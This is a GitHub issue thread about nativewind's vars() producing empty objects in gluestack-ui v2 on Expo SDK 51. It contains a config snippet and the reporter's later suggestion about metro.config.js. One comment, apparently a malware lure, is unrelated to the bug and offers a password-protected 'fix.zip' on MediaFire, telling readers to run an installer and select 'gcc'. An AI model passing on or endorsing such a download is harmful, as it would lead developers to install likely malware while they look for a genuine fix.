### ISSUE TITLE
The vars feature using nativewind in Using CSS Variables does not work

### ISSUE THREAD

**Issue by tipbsy** [gluestack/gluestack-ui#2424]
### Description

The vars feature using nativewind in Using CSS Variables does not work

### CodeSandbox/Snack link

https://gluestack.io/ui/docs/home/theme-configuration/dark-mode

### Steps to reproduce

```
// config.ts
export const config = {
  light: vars({
    '--color-primary': '51 51 51',
  }),
  dark: vars({
    '--color-primary': '240 240 240',
  })
}
```

![20240829110634](https://github.com/user-attachments/assets/38efacb5-a3b4-4559-a55b-f95a32099907)

According to the official documentation's Using CSS Variables configuration, the vars of nativewind are converted to empty objects. Attempting to upgrade nativewind prompts incompatibility.

### gluestack-ui Version

v2

### Platform

- [X] Expo
- [ ] React Native CLI
- [ ] Next
- [ ] Web
- [ ] Android
- [ ] iOS

### Additional Information

in expo SDK51

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tipbsy** [comment]
如果你是tailwind样式未生效，去配置[metro.config.js](https://www.nativewind.dev/v4/getting-started/expo-router)，init的时候缺少metro.config.js的配置写入导致的不生效和转换异常，官方那边给我的结论是生成后就会挂到目录中并删除 所以打印出来是空，但是我觉得是未配置metro.config.js的原因。
